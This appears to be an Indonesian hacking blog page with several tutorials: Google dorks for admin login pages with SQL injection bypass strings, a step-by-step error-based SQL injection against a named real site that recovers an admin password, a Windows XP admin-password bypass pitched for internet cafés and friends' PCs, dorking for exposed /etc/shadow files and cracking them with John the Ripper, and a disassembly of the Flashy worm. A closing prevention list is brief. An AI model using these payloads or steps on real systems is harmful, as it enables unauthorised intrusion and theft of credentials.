English French German Spain Italian DutchRussian Portuguese Japanese Korean Arabic Chinese Simplified

Jebol web dengan SQL Injection

SQL Injection adalah memasukkan kode-kode SQL untuk mendapatkan akses ke database yang lebih besar daripada yang seharusnya kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.

SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masih banyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.

Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Explorer (wajib)
2. PC yang terhubung ke Internet (wajib, kecuali Anda mau hack PC
Anda sendiri)
3. Segelas kopi untuk menghilangkan rasa kantuk (optional)
4. Metallica (optional)

OK, langsung saja kita praktekkan, supaya lebih jelas.

Pertama bukalah [link] (google pancen oye) untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"

Anda bisa menambahkan daftarnya berdasarkan kreatifitas Anda sendiri. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).

Masukkan kode-kode berikut,
User name : ` or `a'='a
Password : ` or `a'='a
(termasuk tanda petiknya)

Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google. Menurut pengalaman saya, dari sekitar 20 link yang saya coba, ada satu atau dua yang berhasil.

Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a

Di bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Anda masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.

Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

diambil dari tutorial yang tersebar di internet

=======================================================
Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan iko (iko94@yahoo.com)

Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya, beserta nama tabel yang mungkin berbeda-beda. Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN), ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan klausa sum sebelum menentukan apakah jumlah kolom-kolom di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah) yang berlaku untuk type kolom numerik, jadi untuk type kolom yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :

--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN-- dengan kolom yang berikutnya. Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password, untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'-- artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda isi sendiri dengan cara coba-coba
Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
http://www.pln-wilkaltim.co.id/dari_...&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tb_news.NewsId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya. Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack oleh Shizoprenic, juga ada di tabel-tabel suatu database, jadi tetep bisa dimasuki dengan cara SQL Injection ini.


************************************************** ****
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
************************************************** ****
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa di inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
(c) virologi
Posted on 00.25 by aZi and filed under | 0 Comments »

Jebol Password Admin Windows XP version 2002 dengan SafMod

Cara ini dah lama sekali digunakan n byk user yg dah tau but sapa tau masih ada people yg mempertanyakanX. Saya gunakan cara ini pada warnet yang memproteksi secara berlebihan so waktu gw abiz donlot software n coba gw install ehh ternyata g bs n muncul pesen "Disable by your administrator" ihh pegel kan klo kayak gitu. Gunakan saja cara ini pada teman yang pelit dan gak mau minjemin kompiX dengan cara mempassword kompiX hehehehe, but saya sarankan jgn coba-coba iseng yah... but klo saya sih boleh hehehehhe...
Important: jgn coba cara ini pada kompi yg di deepfreeze coz software tsb mendisable / mereboot kembali klo masuk ke safeboot.

Pertama : Hidupkan kompimu
Kedua : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe mode" tunggu beberapa menit
Ketiga : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
Keempat : Isi login dengan Administrator serta passwordnya terserah anda pokoknya passwordnya mudah di ingat oleh anda sendiri
Kelima : Jika telah melakukan hal di atas, restart kembali komputer anda
Keenam : Pilihlah start in normaly windows kalo ngga salah heheheh
Ketujuh : Tekan kembali Ctrl + Alt + Del
Kedelapan : Ketikkan nama loginnya Administrator terus password yang baru anda ubah tadi
Kesembilan : Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda
Kesepuluh : Selesai......terserah anda mau lakukan apasaja
(c) virologi
Posted on 00.23 by aZi and filed under | 0 Comments »

Cracking dengan John The Ripper dan Google

Pencurian dan penyerobotan password di dunia maya sudah sering terjadi, bukan karena sang admin yang kurang hebat, atau karena sistem yang mudah ditembus. Tetapi dari faktor user-nya sendiri karena menggunakan password yang terlalu mudah untuk ditebak. Contoh password yang bagus maupun yang buruk ada pada sub bab sebelumnya.
Mencuri password adalah pekerjaan yang mudah bagi para maling. Bahkan beberapa password situs porno yang dibobol pun sering disebarluaskan di situs – situs underground internet dan dibagikan secara gratis. Berbeda dengan password untuk transaksi di bank atau money transfer lainnya. File password untuk transaksi tersebut dijual secara potongan oleh para cracker yang tidak bertanggung jawab. Hal ini dikarenakan informasi tersebut sangat penting sekali, sehingga memang sangat – sangat berharga dibanding dengan password situs porno.
Untuk mencuri suatu file password kita harus tau, file password tersebut sebenarnya terletak dimana, jika anda memakai system operasi linux maka file passwordnya ada di /etc/passwd dan file shadows-nya atau file pendekripnya ada di /etc/shadow.
Kita tidak perlu memakai metode yang sangat susah sekali untuk mencari file password, jika ingin tahu..ya baca sub bab sebelumnya saja. Contoh mencuri password disini cukup menggunakan search engine google. Ikuti langkah berikut untuk mencuri dan meng-crack password:

1. Buka situs google di www.google.co.id
2. Kemudian ketik di search box-nya :
Inurl:/etc/passwd/
3. maka akan muncul link yang mengandung file /etc/passwd yang kebetulan tertangkap oleh google



4. Klik salah satu link tersebut, maka akan menampilkan situs yang mempunyai file /etc/passwd dan yang paling berbahaya, situs tersebut menampilkan isi dari file /etc/passwd, seperti pada gambar berikut :



5. buka notepad kemudian kopi seluruh isi file ke notepad dan simpan ke dalam nama tertentu, misalnya passwd.txt
6. Setelah itu ganti tulisan URL yang tadinya :
http://www.lansys.ch/support/config/etc/passwd-

menjadi

http://www.lansys.ch/support/config/etc/shadow-

Maka akan pada browser akan muncul file /etc/shadow dari situs tersebut, file ini berisi pen-dekrip password, cukup copy ke notepad dan simpan dengan nama shadow.txt



7. Download John The Ripper(JTR) untuk meng-crack password nya yang ada di www.openwall.com/john/
8. Extract file JTR tadi ke dalam sebuah folder.
9. Kemudian buka John The Ripper lewat DOS (Diskette Operating System) Shell
10. Kemudian jalankan program unshadow.exe , yaitu program untuk menggabungkan file /etc/passwd dan /etc/shadow tadi agar memudahkan peng-crack-an. Syntaxnya adalah :

Unshadow [spasi] filepassword [spasi] fileshadow [spasi] >> [spasi] filecrack.txt

11. Atau cukup ketik :

Unshadow passwd.txt shadow.txt >> cracker.txt

Kemudian tekan enter, maka akan muncul seperti gambar berikut:



12. Kemudian pakailah program john-mmx.exe untuk mengcrack hasil penggabungan tadi, syntax penulisannya adalah:

John-mmx [spasi] cracker.txt

Kemudian tekan enter, maka akan muncul tampilan seperti berikut :



Dari gambar diatas coba lihat baris yang ada tulisan:
cobra (birkr)

Nah itulah user dan passwordnya, user : cobra dan password : birkr , cracker JACK!!!! Silakan coba passwordnya di situs yang anda ambil file /etc/password dan /etc/shadow tadi, jika belum berhasil tunggu hasil cracking selanjutnya untuk dicoba...
(c) virologi
Posted on 00.17 by aZi and filed under | 0 Comments »

Bedah Virus w32.flashy@chris

Membedah virus bukan pekerjaan yang menakutkan. Mungkin sama saja seperti membedah orang, ya… tapi masih ada bedanya duonkkkkkkkk…. Kalo membedah, jika ada kesalahan pada pembedahannya … maka gak bisa di Undo kan…nah kalau membedah virus masih bisa di-Undo… yaitu dengan mem-backup system atau file – file yang penting di komputer anda…gunakan saja deep freeze, atau gunakan system restore-nya windows … gitu deh.

Nah sekarang kita akan mencoba membedah Virus w32.flashy@chris, yaitu virus brontok entah varian yang kesekian atau memang bukan brontok tetapi virus yang berkiblat ke sana. Kali ini virus tersebut tidak ditulis dengan vb melainkan C++. Dan di bungkus atau di-pack memakai FSG v2.0.

Sebelum membedah virus tersebut, mau tidak mau kita harus membuka pembungkus atau packer dari virus tersebut…ikuti langkah – langkah di bawah ini:

1. Ambil file contoh virus w32.flashy@chris
2. Nah untuk melihat virus tersebut dibungkus memakai apa, gunakan RDG Packer Detector, bisa didownload di groups.yahoo.com/group/virologi maka akan muncul gambar seperti di bawah ini:



3. Nah terlihat dengan jelas bahwa file virus memakai pembungkus FSG v2.0
4. Untuk meng-crack pembungkus tersebut cari aja di www.google.co.id dengan kata kunci ‘unFSG’, maka akan bermunculan unPacker virusnya, banyak kok
5. Kenapa harus di unpack? Soalnya kalau gak diunpack, gak akan keliahatan jika kita ingin melihat atau membongkar source code file virus tersebut.
6. Kemudian buka file virus memakai Ollydbg, maka akan kelihatan isi dari virus tersebut, menyerang di registry mana dan menelurkan file induk virus dengan nama apa saja.

PEMBEDAHAN ISI VIRUS BARIS AWAL
Coba lihat badan virus yang ada pada alamat 00401000 sampai 004010B4

00401000 $ 51 PUSH ECX
00401001 . 56 PUSH ESI
00401002 . 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
00401007 . 68 207B4000 PUSH Flashyun.00407B20 ; |PathBuffer = Flashyun.00407B20
0040100C . 6A 00 PUSH 0 ; |hModule = NULL
0040100E . FF15 1C604000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401014 . 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
00401019 . 68 247C4000 PUSH Flashyun.00407C24 ; |Buffer = Flashyun.00407C24
0040101E . FF15 18604000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
00401024 . 68 287D4000 PUSH Flashyun.00407D28 ; /Buffer = Flashyun.00407D28
00401029 . 68 04010000 PUSH 104 ; |BufSize = 104 (260.)
0040102E . FF15 14604000 CALL DWORD PTR DS:[<&KERNEL32.GetCurrent>; \GetCurrentDirectoryA
00401034 . 68 88704000 PUSH Flashyun.00407088 ; /MutexName = "||Flashy||"
00401039 . 6A 01 PUSH 1 ; |InitialOwner = TRUE
0040103B . 6A 00 PUSH 0 ; |pSecurity = NULL
0040103D . FF15 28604000 CALL DWORD PTR DS:[<&KERNEL32.CreateMute>; \CreateMutexA
00401043 . FF15 3C604000 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
00401049 . 3D B7000000 CMP EAX,0B7
0040104E . 75 0F JNZ SHORT Flashyun.0040105F
00401050 . E8 BB000000 CALL Flashyun.00401110
00401055 . 6A 00 PUSH 0 ; /ExitCode = 0
00401057 . FF15 40604000 CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess
0040105D . EB 05 JMP SHORT Flashyun.00401064
0040105F > E8 DC010000 CALL Flashyun.00401240
00401064 > 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00401068 . 50 PUSH EAX ; /pThreadId
00401069 . 6A 00 PUSH 0 ; |CreationFlags = 0
0040106B . 6A 00 PUSH 0 ; |pThreadParm = NULL
0040106D . 68 E0174000 PUSH Flashyun.004017E0 ; |ThreadFunction = Flashyun.004017E0
00401072 . 6A 00 PUSH 0 ; |StackSize = 0
00401074 . 6A 00 PUSH 0 ; |pSecurity = NULL
00401076 . FF15 44604000 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
0040107C . 8B35 EC604000 MOV ESI,DWORD PTR DS:[<&SHELL32.ShellExe>; SHELL32.ShellExecuteA
00401082 . 6A 00 PUSH 0 ; /IsShown = 0
00401084 . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
00401089 . 68 78704000 PUSH Flashyun.00407078 ; |Parameters = "start telnet"
0040108E . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
00401093 . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
00401098 . 6A 00 PUSH 0 ; |hWnd = NULL
0040109A . FFD6 CALL ESI ; \ShellExecuteA
0040109C . 6A 00 PUSH 0 ; /IsShown = 0
0040109E . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
004010A3 . 68 4C704000 PUSH Flashyun.0040704C ; |Parameters = "user administrator hacked"
004010A8 . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
004010AD . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
004010B2 . 6A 00 PUSH 0 ; |hWnd = NULL
004010B4 . FFD6 CALL ESI ; \ShellExecuteA

Dapat dilihat di alamat 00401034 ada tulisan MutexName = "||Flashy||" Di situ nama file viru stersebut adalah flashy atau flag-nya adalah flashy. Nah dari situ kalian dapat memberi nama virus tersebut adalah flashy terserah w32.flashy atau worm.flahsy atau virus.flashy terserah lah…… coba lihat Pada baris

00401089 . 68 78704000 PUSH Flashyun.00407078 ; |Parameters = "start telnet"
0040108E . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
00401093 . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
00401098 . 6A 00 PUSH 0 ; |hWnd = NULL
0040109A . FFD6 CALL ESI ; \ShellExecuteA
0040109C . 6A 00 PUSH 0 ; /IsShown = 0
0040109E . 68 247C4000 PUSH Flashyun.00407C24 ; |DefDir = ""
004010A3 . 68 4C704000 PUSH Flashyun.0040704C ; |Parameters = "user administrator hacked"
004010A8 . 68 70704000 PUSH Flashyun.00407070 ; |FileName = "net.exe"
004010AD . 68 68704000 PUSH Flashyun.00407068 ; |Operation = "open"
004010B2 . 6A 00 PUSH 0 ; |hWnd = NULL
004010B4 . FFD6 CALL ESI ; \ShellExecuteA

Nah disini virus menjalankan file system windows bernama net.exe dan memberi pesan ke administrator bahwa user administrator hacked, sepertinya virus mencoba masuk ke sistem dan menghacking user administrator.

BARIS PENCARIAN DRIVE
Nah baris pencarian drive virus sendiri ada di sini nih:

004010C3 . 68 48704000 PUSH Flashyun.00407048 ; ASCII "d:"
004010C8 . E8 B3060000 CALL Flashyun.00401780
004010CD . 68 44704000 PUSH Flashyun.00407044 ; ASCII "e:"
004010D2 . E8 A9060000 CALL Flashyun.00401780
004010D7 . 68 40704000 PUSH Flashyun.00407040 ; ASCII "f:"
004010DC . E8 9F060000 CALL Flashyun.00401780
004010E1 . 68 3C704000 PUSH Flashyun.0040703C ; ASCII "g:"
004010E6 . E8 95060000 CALL Flashyun.00401780
004010EB . 68 38704000 PUSH Flashyun.00407038 ; ASCII "h:"
004010F0 . E8 8B060000 CALL Flashyun.00401780
004010F5 . 68 34704000 PUSH Flashyun.00407034 ; ASCII "i:"
004010FA . E8 81060000 CALL Flashyun.00401780
004010FF . 68 30704000 PUSH Flashyun.00407030 ; ASCII "j:"
00401104 . E8 77060000 CALL Flashyun.00401780

Sedangkan untuk mencari jenis drive, virus menjalankan perintah berikut:

004011D8 |. 50 PUSH EAX ; /RootPathName
004011D9 |. FF15 20604000 CALL DWORD PTR DS:[<&KERNEL32.GetDriveTy>; \GetDriveTypeA

BARIS MANIPULASI REGISTRY WINDOWS
Nah kalau dibawah ini si virus menulis registry windows di alamat HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Explorer dengan value “Logon User Name” yang berguna untuk membuat user login

00401384 |. 53 PUSH EBX ; |Reserved => 0
00401385 |. 8B35 0C604000 MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; |ADVAPI32.RegOpenKeyExA
0040138B |. 68 08714000 PUSH Flashyun.00407108 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Explorer"
00401390 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
00401395 |. FFD6 CALL ESI ; \RegOpenKeyExA
00401397 |. 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
0040139B |. 8D4C24 44 LEA ECX,DWORD PTR SS:[ESP+44]
0040139F |. 8D9424 4C01000>LEA EDX,DWORD PTR SS:[ESP+14C]
004013A6 |. 51 PUSH ECX ; /pBufSize
004013A7 |. 52 PUSH EDX ; |Buffer
004013A8 |. 53 PUSH EBX ; |pValueType => NULL
004013A9 |. 53 PUSH EBX ; |Reserved => NULL
004013AA |. 68 F8704000 PUSH Flashyun.004070F8 ; |ValueName = "Logon User Name"
004013AF |. 50 PUSH EAX ; |hKey
004013B0 |. FF15 00604000 CALL DWORD PTR DS:[<&ADVAPI32.RegQueryVa>; \RegQueryValueExA

Pada baris ini juga virus memanipulasi registry windows untuk memaksa menjalankan file flashy.exe ketika windows berjalan pertama kali:

00401476 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
0040147B |. 50 PUSH EAX ; |Buffer
0040147C |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
0040147E |. 53 PUSH EBX ; |Reserved
0040147F |. 68 98704000 PUSH Flashyun.00407098 ; |ValueName = "Flashy Bot"
00401484 |. 51 PUSH ECX ; |hKey
00401485 |. FF15 04604000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
0040148B |. 8B5424 10 MOV EDX,DWORD PTR SS:[ESP+10]
0040148F |. 52 PUSH EDX ; /hKey
00401490 |. FF15 08604000 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey

BARIS PEMICU FILE

Nah untuk penggandaan, virus akan menjalankan file di bawah ini, yaitu dengan cara menyalin file systemID.pif ke
"%s\Documents and Settings\%s\Start Menu\Programs\Startup\systemID.pif dimana %s adalah user yang ada di windows dan drive dimana windows terinstall.

004013DB |. 68 B0704000 PUSH Flashyun.004070B0 ; ASCII "%s\Documents and Settings\%s\Start Menu\Programs\Startup\systemID.pif"
004013E0 |. 51 PUSH ECX
004013E1 |. E8 48060000 CALL Flashyun.00401A2E
004013E6 |. 8B3D 2C604000 MOV EDI,DWORD PTR DS:[<&KERNEL32.CopyFil>; kernel32.CopyFileA
004013EC |. 83C4 1C ADD ESP,1C
004013EF |. 8D9424 5002000>LEA EDX,DWORD PTR SS:[ESP+250]
004013F6 |. 53 PUSH EBX ; /FailIfExists
004013F7 |. 52 PUSH EDX ; |NewFileName
004013F8 |. 68 207B4000 PUSH Flashyun.00407B20 ; |ExistingFileName = ""
004013FD |. FFD7 CALL EDI ; \CopyFileA


Nah pada baris berikut ini adalah baris dimana virus akan men-cek apakah file induknya telah ada di c:\Windows\System32 atau belum, jika belum ada maka virus mengkopi file induk bernama flashy.exe ke c:\Windows\System32 dan men-set atribut file tersebut adalah hidden, sehingga mereka tidak mengetahui dimana letak file induk virus

00401431 |. 68 A4704000 PUSH Flashyun.004070A4 ; /StringToAdd = "\Flashy.exe"
00401436 |. 51 PUSH ECX ; |ConcatString
00401437 |. FF15 48604000 CALL DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; \lstrcatA
0040143D |. 8D5424 48 LEA EDX,DWORD PTR SS:[ESP+48]
00401441 |. 53 PUSH EBX
00401442 |. 52 PUSH EDX
00401443 |. 68 207B4000 PUSH Flashyun.00407B20
00401448 |. FFD7 CALL EDI
0040144A |. 8D4424 48 LEA EAX,DWORD PTR SS:[ESP+48]
0040144E |. 6A 02 PUSH 2 ; /FileAttributes = HIDDEN
00401450 |. 50 PUSH EAX ; |FileName
00401451 |. FF15 24604000 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA

Di baris ini si virus melakukan pencarian terhadap folder yang akan ditulari oleh file virus. Maksudnya mengcopy ke dalam folder tersebut file virus yang diberi nama sesuai dengan nama folder tersebut

00401504 |. BF 44714000 MOV EDI,Flashyun.00407144 ; ASCII "\*.*"
00401509 |. 83C9 FF OR ECX,FFFFFFFF
0040150C |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040150E |. F7D1 NOT ECX
00401510 |. 2BF9 SUB EDI,ECX
00401512 |. 8BF7 MOV ESI,EDI
00401514 |. 8BD9 MOV EBX,ECX
00401516 |. 8BFA MOV EDI,EDX
00401518 |. 83C9 FF OR ECX,FFFFFFFF
0040151B |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040151D |. 8BCB MOV ECX,EBX
0040151F |. 4F DEC EDI
00401520 |. C1E9 02 SHR ECX,2
00401523 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401525 |. 8BCB MOV ECX,EBX
00401527 |. 8D8424 1801000>LEA EAX,DWORD PTR SS:[ESP+118]
0040152E |. 83E1 03 AND ECX,3
00401531 |. 50 PUSH EAX ; /pFindFileData
00401532 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
00401534 |. 8D8C24 5C02000>LEA ECX,DWORD PTR SS:[ESP+25C] ; |
0040153B |. 51 PUSH ECX ; |FileName
0040153C |. FF15 38604000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstF>; \FindFirstFileA
00401542 |. 8B1D 4C604000 MOV EBX,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
